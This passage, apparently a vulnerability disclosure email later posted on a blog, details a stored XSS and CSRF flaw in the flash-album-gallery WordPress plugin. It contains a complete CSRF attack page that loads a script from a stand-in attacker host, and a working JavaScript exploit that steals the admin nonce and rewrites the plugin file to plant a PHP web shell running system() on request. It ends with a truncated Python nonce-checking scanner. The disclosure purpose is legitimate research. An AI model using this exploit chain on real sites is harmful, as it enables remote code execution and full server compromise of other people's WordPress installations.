<div class="highlight"><pre><span></span><code><span class="x"> </span><span class="cp"><?php</span> <span class="k">if</span><span class="p">(</span><span class="nv">$added</span><span class="o">===</span><span class="k">false</span><span class="p">)</span> <span class="p">{</span> <span class="cp">?></span><span class="x"></span>
<span class="x"> <input name="updateMedia" class="button-primary" style="float: right;" type="submit" value="</span><span class="cp"><?php</span> <span class="nx">_e</span><span class="p">(</span><span class="s1">'Update Media'</span><span class="p">,</span><span class="s1">'flag'</span><span class="p">);</span> <span class="cp">?></span><span class="x">" /></span>
<span class="x"> </span><span class="cp"><?php</span> <span class="k">if</span> <span class="p">(</span> <span class="nb">function_exists</span><span class="p">(</span><span class="s1">'json_encode'</span><span class="p">)</span> <span class="p">)</span> <span class="p">{</span> <span class="cp">?></span><span class="x"></span>
<span class="x"> <select name="bulkaction" id="bulkaction"></span>
<span class="x"> <option value="no_action" ></span><span class="cp"><?php</span> <span class="nx">_e</span><span class="p">(</span><span class="s2">"No action"</span><span class="p">,</span><span class="s1">'flag'</span><span class="p">);</span> <span class="cp">?></span><span class="x"></option></span>
<span class="x"> <option value="new_playlist" ></span><span class="cp"><?php</span> <span class="nx">_e</span><span class="p">(</span><span class="s2">"Create new playlist"</span><span class="p">,</span><span class="s1">'flag'</span><span class="p">);</span> <span class="cp">?></span><span class="x"></option></span>
<span class="x"> </select></span>
<span class="x"> <input name="showThickbox" class="button-secondary" type="submit" value="</span><span class="cp"><?php</span> <span class="nx">_e</span><span class="p">(</span><span class="s1">'Apply'</span><span class="p">,</span><span class="s1">'flag'</span><span class="p">);</span> <span class="cp">?></span><span class="x">" onclick="if ( !checkSelected() ) return false;" /></span>
<span class="x"> </span><span class="cp"><?php</span> <span class="p">}</span> <span class="cp">?></span><span class="x"></span>
<span class="x"> <a href="</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">admin_url</span><span class="p">(</span> <span class="s1">'media-new.php'</span><span class="p">);</span> <span class="cp">?></span><span class="x">" class="button"></span><span class="cp"><?php</span> <span class="nx">_e</span><span class="p">(</span><span class="s1">'Upload Music'</span><span class="p">,</span><span class="s1">'flag'</span><span class="p">);</span> <span class="cp">?></span><span class="x"></a></span>
<span class="x"> <input type="hidden" id="items_array" name="items_array" value="" /></span>
<span class="x"> </span><span class="cp"><?php</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="cp">?></span><span class="x"></span>
<span class="x"> <input type="hidden" name="mode" value="save" /></span>
<span class="x"> <input style="width: 80%;" type="text" id="items_array" name="items_array" readonly="readonly" value="</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nv">$added</span><span class="p">;</span> <span class="cp">?></span><span class="x">" /></span>
<span class="x"> <input type="hidden" name="playlist_title" value="</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">esc_html</span><span class="p">(</span><span class="nb">stripslashes</span><span class="p">(</span><span class="nv">$playlist</span><span class="p">[</span><span class="s1">'title'</span><span class="p">]));</span> <span class="cp">?></span><span class="x">" /></span>
<span class="x">===> <input type="hidden" name="skinname" value="</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nv">$playlist</span><span class="p">[</span><span class="s1">'skin'</span><span class="p">];</span> <span class="cp">?></span><span class="x">" /></span>
<span class="x">===> <input type="hidden" name="skinaction" value="</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nv">$playlist</span><span class="p">[</span><span class="s1">'skin'</span><span class="p">];</span> <span class="cp">?></span><span class="x">" /></span>
<span class="x"> <textarea style="display: none;" name="playlist_descr" cols="40" rows="1"></span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">esc_html</span><span class="p">(</span><span class="nb">stripslashes</span><span class="p">(</span><span class="nv">$playlist</span><span class="p">[</span><span class="s1">'description'</span><span class="p">]));</span> <span class="cp">?></span><span class="x"></textarea></span>
<span class="x"> <input name="addToPlaylist" class="button-secondary" type="submit" value="</span><span class="cp"><?php</span> <span class="nx">_e</span><span class="p">(</span><span class="s1">'Update Playlist'</span><span class="p">,</span><span class="s1">'flag'</span><span class="p">);</span> <span class="cp">?></span><span class="x">" /></span>
<span class="x"> </span><span class="cp"><?php</span> <span class="p">}</span> <span class="cp">?></span><span class="x"></span>
</code></pre></div>
<p>Hence, the form which creates the request is also responsible for the
writing the tainted data back to the screen. If find it rather strange
that<br>
all the other echo function usages are wrapped with <code>esc_html()</code> calls
but it was forgotten that $playlist['skin'] holds tainted data as
well.<br>
Maybe the changes in the last fix [As reported by 'Ken S'] weren't that
deep. But more likely, this is just another bug which hasn't been found
before.</p>
<h3>Now what can an attacker do with this exploit?</h3>
<p>He could gain access to the server and remote code execution for
example. Imagine we tricked an wordpress administrator which<br>
still has valid admin cookies for his wordpress site [Which is quite
often the case when you look at your blog] into visiting a<br>
site with a hidden form. You cold for example write a comment on the
wordpress site with a link to the attacking site, which incorporates<br>
the attacking code below. This would be a quite strong attack, since
every wordpress administrator is happy to see comments on his site
[Source:<br>
I am a wordpress admin myself]. Then he is genuinely interested to
follow the link. Why should he assume that it is dangerous? Lot's of
people leave<br>
the link of their own sites in wordpress comment section. As soon as
the wordpress administrator [He needs to be logged in, which is normally
the case]<br>
follows the link, the server is entirely busted. No need to crack
password hashes or find further privilege escalation ways. Why? See
below the code that<br>
is executed if he follows the link:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><!DOCTYPE html></span>
<span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">title</span><span class="p">></span>Stored XSS CSRF exploit.<span class="p"></</span><span class="nt">title</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">http-equiv</span><span class="o">=</span><span class="s">"Content-Type"</span> <span class="na">content</span><span class="o">=</span><span class="s">"text/html; charset=UTF-8"</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span>
<span class="kd">function</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">ref</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">XMLHttpRequest</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// For recent browsers.</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">ActiveXObject</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Older IE 6,7,8</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">ActiveXObject</span><span class="p">(</span><span class="s2">"MSXML2.XMLHTTP.3.0"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">ref</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">send_payload</span><span class="p">(</span><span class="nx">payload</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">TARGET_URL</span> <span class="o">=</span> <span class="s2">"http://localhost/wordpress/wp-admin/admin.php?page=flag-banner-box&playlist=null&mode=edit"</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">req</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nx">req</span> <span class="o">=</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">();</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span> <span class="o">&&</span> <span class="nx">req</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mf">200</span><span class="p">)</span> <span class="p">{</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"success_indicator"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="s2">"payload sent."</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"POST"</span><span class="p">,</span> <span class="nx">TARGET_URL</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">setRequestHeader</span><span class="p">(</span><span class="s2">"Content-type"</span><span class="p">,</span> <span class="s2">"application/x-www-form-urlencoded"</span><span class="p">);</span>
<span class="cm">/* Build the post data */</span>
<span class="kd">var</span> <span class="nx">pd</span> <span class="o">=</span> <span class="p">{</span><span class="s2">"playlist_title"</span><span class="o">:</span> <span class="s2">"sometitle"</span><span class="p">,</span>
<span class="s2">"playlist_descr"</span><span class="o">:</span> <span class="s2">"some_description"</span><span class="p">,</span>
<span class="s2">"mode"</span><span class="o">:</span> <span class="s2">"save"</span><span class="p">,</span>
<span class="s2">"skinname"</span><span class="o">:</span> <span class="s1">'" '</span> <span class="o">+</span> <span class="nx">payload</span><span class="p">,</span>
<span class="s2">"item_array[0]"</span><span class="o">:</span> <span class="s2">"notimportant"</span><span class="p">};</span>
<span class="nx">postdata</span> <span class="o">=</span> <span class="s2">""</span><span class="p">;</span>
<span class="k">for</span><span class="p">(</span><span class="kd">var</span> <span class="nx">key</span> <span class="ow">in</span> <span class="nx">pd</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">postdata</span> <span class="o">+=</span> <span class="p">(</span><span class="nx">key</span> <span class="o">+</span> <span class="s2">"="</span> <span class="o">+</span> <span class="nx">pd</span><span class="p">[</span><span class="nx">key</span><span class="p">]</span> <span class="o">+</span> <span class="s2">"&"</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">postdata</span> <span class="o">=</span> <span class="nx">postdata</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="nx">postdata</span><span class="p">.</span><span class="nx">length</span><span class="o">-</span><span class="mf">1</span><span class="p">);</span> <span class="c1">// rstrip the last &</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">postdata</span><span class="p">);</span>
<span class="p">}</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="kd">var</span> <span class="nx">payload</span> <span class="o">=</span> <span class="s2">"<script type="</span><span class="nx">text</span><span class="o">/</span><span class="nx">javascript</span><span class="s2">" src="</span><span class="nx">http</span><span class="o">:</span><span class="err">//atacker.com/exploit.js">//Nothin here</span><span class="p"></</span><span class="nt">script</span><span class="p">></span>"; send_payload(payload);<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">div</span> <span class="na">id</span><span class="o">=</span><span class="s">"success_indicator"</span><span class="p">></</span><span class="nt">div</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p>Then as soon as the payload is executed, the following exploit code is
loaded from another site which actually<br>
does the evil stuff [See code above, the last lines are probably the
most interesting]. It basically uses the upload functionality in
wordpress to change plugincode.<br>
This leads to remote code execution and the worst case scenario
happened: An attacker can issue system() calls with the permissions<br>
of the web server.</p>
<h3>The exploit code:</h3>
<div class="highlight"><pre><span></span><code><span class="cm">/* </span>
<span class="cm"> * Copyright: Nikolai Tschacher.</span>
<span class="cm"> * Site: incolumitas.com</span>
<span class="cm"> * Easy as pie.</span>
<span class="cm"> * What: Use this code when you found a stored XSS in a wordpress plugin to gain RCE.</span>
<span class="cm"> * How: A wordpress admin needs to run this code in his browser with a valid session id.</span>
<span class="cm"> * Idea: Mofify the flash-album-gallery plugin via wordpress admin panel.</span>
<span class="cm"> * </span>
<span class="cm"> * Note: This is actually nothing new. It's just one of many ways to gain RCE</span>
<span class="cm"> * if you have a stored XSS in a wordpress session.</span>
<span class="cm"> */</span>
<span class="c1">// Without php tags</span>
<span class="c1">// HTML meta chars are in character entity references format.</span>
<span class="kd">var</span> <span class="nx">EXPLOIT_CODE</span> <span class="o">=</span> <span class="s2">"\nif (isset($_GET[&#039;cmd&#039;])&amp;&amp; !empty($_GET[&#039;cmd&#039;])){ echo &#039;<pre>&#039;;system($_GET[&#039;cmd&#039;]);echo &#039;</pre>&#039;; }"</span><span class="p">;</span>
<span class="c1">// TARGET SETTINGS. Set stuff here.</span>
<span class="kd">var</span> <span class="nx">TARGET_WP_PATH</span> <span class="o">=</span> <span class="s2">"http://localhost/wordpress"</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">PLUGIN_EDITOR_URL</span> <span class="o">=</span> <span class="nx">TARGET_WP_PATH</span> <span class="o">+</span> <span class="s2">"/wp-admin/plugin-editor.php"</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">PLUGIN_EDIT_URL</span> <span class="o">=</span> <span class="nx">PLUGIN_EDITOR_URL</span> <span class="o">+</span> <span class="s2">"?file=flash-album-gallery/flag.php"</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">ref</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">XMLHttpRequest</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// For recent browsers.</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">ActiveXObject</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Older IE 6,7,8</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">ActiveXObject</span><span class="p">(</span><span class="s2">"MSXML2.XMLHTTP.3.0"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">ref</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* Extract the nonce */</span>
<span class="kd">function</span> <span class="nx">exploit</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">req</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nx">req</span> <span class="o">=</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">();</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span> <span class="o">&&</span> <span class="nx">req</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mf">200</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">res</span> <span class="o">=</span> <span class="sr">/name="_wpnonce"\svalue=\"[a-z0-9]{10}\"/</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">responseText</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">length</span> <span class="o">==</span> <span class="mf">1</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">nonce</span> <span class="o">=</span> <span class="sr">/[a-z0-9]{10}/</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="nx">res</span><span class="p">[</span><span class="mf">0</span><span class="p">]);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="c1">// The sites not available. Maybe the plugin is not installed?!</span>
<span class="nx">nonce</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">modify_plugin</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">responseText</span><span class="p">,</span> <span class="nx">nonce</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"GET"</span><span class="p">,</span> <span class="nx">PLUGIN_EDIT_URL</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span>
<span class="p">}</span>
<span class="cm">/* Modify the plugin with malicous code with plugin editor */</span>
<span class="kd">function</span> <span class="nx">modify_plugin</span><span class="p">(</span><span class="nx">responseText</span><span class="p">,</span> <span class="nx">nonce</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Get the plugin code</span>
<span class="c1">// On each wordpress plugin edit site, there's just one textarea tag.</span>
<span class="c1">// The plugin code itself lies between the textarea tags.</span>
<span class="c1">// These regexes aren't really good.</span>
<span class="kd">var</span> <span class="nx">startIndex</span> <span class="o">=</span> <span class="nx">responseText</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/<textarea.*?name="newcontent".*?>/</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">stopIndex</span> <span class="o">=</span> <span class="nx">responseText</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/<\/textarea>/</span><span class="p">);</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">responseText</span><span class="p">.</span><span class="nx">substring</span><span class="p">(</span><span class="nx">startIndex</span><span class="p">.</span><span class="nx">index</span><span class="o">+</span><span class="nx">startIndex</span><span class="p">[</span><span class="mf">0</span><span class="p">].</span><span class="nx">length</span><span class="p">,</span> <span class="nx">stopIndex</span><span class="p">.</span><span class="nx">index</span><span class="p">);</span>
<span class="c1">// add our exploit code at the beginning of the plugin after the "// Stop direct call" comment.</span>
<span class="k">if</span> <span class="p">(</span><span class="sr">/((\/){2}\sStop\sdirect\scall)/</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">pluginCode</span><span class="p">))</span> <span class="p">{</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">pluginCode</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/((\/){2}\sStop\sdirect\scall)/</span><span class="p">,</span> <span class="s2">"$1"</span> <span class="o">+</span> <span class="nx">EXPLOIT_CODE</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="c1">// Let's go for the first line after the obligatory wp plugin comment and lets use the closing comment</span>
<span class="c1">// characters */ as needle as a fallback.</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">pluginCode</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/^(\*\/)/m</span><span class="p">,</span> <span class="s2">"$1"</span> <span class="o">+</span> <span class="s2">"\n"</span> <span class="o">+</span> <span class="nx">EXPLOIT_CODE</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// We need to consider that the plugin code in this state is making use of Character entity references</span>
<span class="c1">// for all html meta characters like " ' < > & \ to avoid them of being interepreted as markup.</span>
<span class="c1">// We need to replace them with their "real" characters, before we send the plugin as post data.</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">removeCharEntityReferences</span><span class="p">(</span><span class="nx">pluginCode</span><span class="p">);</span>
<span class="c1">// Ready to build our POST request</span>
<span class="nx">preq</span> <span class="o">=</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">();</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">preq</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span> <span class="o">&&</span> <span class="nx">preq</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mf">200</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">successPattern</span> <span class="o">=</span> <span class="sr">/File\sedited\ssuccessfully./</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">successPattern</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">preq</span><span class="p">.</span><span class="nx">responseText</span><span class="p">))</span>
<span class="nx">alert</span><span class="p">(</span><span class="s2">"Done."</span><span class="p">);</span>
<span class="c1">// Notify the attacker that the exploit has been spawned.</span>
<span class="k">else</span>
<span class="nx">alert</span><span class="p">(</span><span class="s2">"Nope."</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"POST"</span><span class="p">,</span> <span class="nx">PLUGIN_EDITOR_URL</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">setRequestHeader</span><span class="p">(</span><span class="s2">"Content-Type"</span><span class="p">,</span> <span class="s2">"application/x-www-form-urlencoded"</span><span class="p">);</span>
<span class="nx">pd</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">_wpnonce</span><span class="o">:</span> <span class="nx">nonce</span><span class="p">,</span>
<span class="nx">_wp_http_referer</span><span class="o">:</span> <span class="nx">PLUGIN_EDIT_URL</span> <span class="o">+</span> <span class="s2">"&a=te&scrollto=0"</span><span class="p">,</span>
<span class="nx">a</span><span class="o">:</span> <span class="s2">""</span><span class="p">,</span>
<span class="nx">scrollto</span><span class="o">:</span> <span class="s2">"192"</span><span class="p">,</span>
<span class="nx">newcontent</span><span class="o">:</span> <span class="nb">encodeURIComponent</span><span class="p">(</span><span class="nx">pluginCode</span><span class="p">),</span>
<span class="nx">action</span><span class="o">:</span> <span class="s2">"update"</span><span class="p">,</span>
<span class="nx">file</span><span class="o">:</span> <span class="s2">"flash-album-gallery/flag.php"</span><span class="p">,</span>
<span class="nx">plugin</span><span class="o">:</span> <span class="s2">"flash-album-gallery/flag.php"</span><span class="p">,</span>
<span class="nx">submit</span><span class="o">:</span> <span class="s2">"Update+File"</span>
<span class="p">};</span>
<span class="c1">// Build the post data.</span>
<span class="nx">postdata</span> <span class="o">=</span> <span class="s2">""</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">key</span> <span class="ow">in</span> <span class="nx">pd</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">postdata</span> <span class="o">+=</span> <span class="p">(</span><span class="nx">key</span> <span class="o">+</span> <span class="s2">"="</span> <span class="o">+</span> <span class="nx">pd</span><span class="p">[</span><span class="nx">key</span><span class="p">]</span> <span class="o">+</span> <span class="s2">"&"</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">postdata</span> <span class="o">=</span> <span class="nx">postdata</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="nx">postdata</span><span class="p">.</span><span class="nx">length</span><span class="o">-</span><span class="mf">1</span><span class="p">);</span> <span class="c1">// rstrip the last &</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">postdata</span><span class="p">);</span>
<span class="p">}</span>
<span class="cm">/*</span>
<span class="cm"> * Removes the HTML char entity references for the HTML meta characters.</span>
<span class="cm"> */</span>
<span class="kd">function</span> <span class="nx">removeCharEntityReferences</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">((</span><span class="ow">typeof</span> <span class="nx">data</span><span class="p">)</span> <span class="o">!==</span> <span class="s2">"string"</span><span class="p">)</span> <span class="p">{</span>
<span class="k">throw</span> <span class="ow">new</span> <span class="ne">TypeError</span><span class="p">(</span><span class="s2">"data needs to be a string"</span><span class="p">);</span>
<span class="k">return</span> <span class="kc">null</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&quot;/g</span><span class="p">,</span> <span class="s2">"\""</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&#039;/g</span><span class="p">,</span> <span class="s2">"'"</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&lt;/g</span><span class="p">,</span> <span class="s2">"<"</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&gt;/g</span><span class="p">,</span> <span class="s2">">"</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&amp;/g</span><span class="p">,</span> <span class="s2">"&"</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">data</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">exploit</span><span class="p">();</span>
</code></pre></div>
<h3>Conclusion</h3>
<p>What was shown above, is just one specific bug in the
flash-album-gallery plugin. I think that there might be lots more. If
you want to see me notes<br>
of my work, please visit the following file I made during my research
at very bottom of this [large] mail.</p>
<p>But honestly, I have to say you that there are still lots of bugs in the
code and that it would need a rather large amount of time and<br>
some dull hours of work to locate the vast majority of them [Forget
about finding all bugs in software in general]. This means, that I<br>
won't continue spending a lot of time on this project.</p>
<p>Additionally, I have sent this writeup to the wordpress-security bug
bounty program because you know, I would always be happy for some dimes
to<br>
keep my server runnin :D</p>
<p>If you have questions, feel free to contact me.</p>
<p>I am going to publish this mail on my blog as soon as you guys updated
the code and the users had some time to switch versions. But please keep
in mind:<br>
I would really do some serious work in order to find all the bugs!</p>
<p>I advise to uninstall it and NOT use this plugin, before big changes are
made to improve the security architecture.</p>
<p>PS: Maybe you are interested too have a look on the script I wrote to
locate bugs like this:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># PYTHON NONCE INCONSISTENT USE REVEALER</span>
<span class="c1"># COPYRIGHT: Nikolai Tschacher</span>
<span class="c1"># Site: incolumitas.com</span>
<span class="c1"># Walks thorugh a plugin and tries to reveals some inconsistency with nonces which</span>
<span class="c1"># could lead to some vulnerabilities. Sometimes, nonces are created, but never validated.</span>
<span class="c1"># Just a nonce itself does nothing, the action must be actually confirmed.</span>
<span class="c1"># This simply finds all nonces and looks if some stay unchecked. If this is the case, the</span>
<span class="c1"># nonce is useless and there's maybe a threat.</span>
<span class="c1"># About: http://www.prelovac.com/vladimir/improving-security-in-wordpress-plugins-using-nonces</span>
<span class="kn">import</span> <span class="nn">argparse</span>
<span class="kn">import</span> <span class="nn">fnmatch</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="n">DEBUG</span> <span class="o">=</span> <span class="kc">False</span>
<span class="c1"># If a nonce is created but never checked with wp_verify_nonce() (or descendants), the nonce is</span>
<span class="c1"># senseless and no security barrier at all. This script tries to find this flaw.</span>
<span class="c1"># Nonces are random, one time tokens which are usally send with a critical request/form</span>
<span class="c1"># a user can execute in a application. Before the action takes place, the app has to confirm</span>
<span class="c1"># that the nonce is the same as genertated while the form was crafted. If this is not the case,</span>
<span class="c1"># a user is most likely tricked into submitting a form without his consent, since he has never</span>
<span class="c1"># seen the form and thus the nonce hasn't been created and automatically submitted. This prevents</span>
<span class="c1"># CSRF attacks and makes most sql injections and xss attacks rather hard.</span>
<span class="c1"># Approach: We treat simply all strings between braces as possible action arguments. There will be</span>
<span class="c1"># a lot of false positives. But making the regex accurate is simply not feasible because the function</span>
<span class="c1"># calling syntax is ways to hard to parse [lazy and yeah, guilty :D]</span>
<span class="n">R_NONCE_CREATION</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">'(wp_nonce_field|wp_create_nonce|wp_nonce_url)(\s*)\(.*?\)'</span><span class="p">)</span>
<span class="n">R_STRING</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">'(</span><span class="se">\'</span><span class="s1">|").*?\1'</span><span class="p">)</span>
<span class="c1"># Nonces are normally confirmed before the critical action in wp code begins.</span>
<span class="c1"># There are several functions to confirm nonces depending on the situation</span>
<span class="c1"># the form/actions orign. They can be found in \wp-includes\pluggable.php</span>
<span class="c1"># - wp_verify_nonce($nonce, $action = -1)</span>
<span class="c1"># - check_ajax_referer( $action = -1, $query_arg = false, $die = true )</span>
<span class="c1"># - check_admin_referer($action = -1, $query_arg = '_wpnonce')</span>
<span class="n">R_NONCE_CHECK</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">'(check_ajax_referer|wp_verify_nonce|check_admin_referer)(\s*)\(.*?\)'</span><span class="p">)</span>
<span class="n">matches</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">checked</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">def</span> <span class="nf">apply_on_file_content</span><span class="p">(</span><span class="n">root_path</span><span class="p">,</span> <span class="n">callback</span><span class="p">):</span>
<span class="n">pattern</span> <span class="o">=</span> <span class="s1">'.php'</span>
<span class="k">for</span> <span class="n">root</span><span class="p">,</span> <span class="n">dirs</span><span class="p">,</span> <span class="n">files</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">root_path</span><span class="p">):</span>
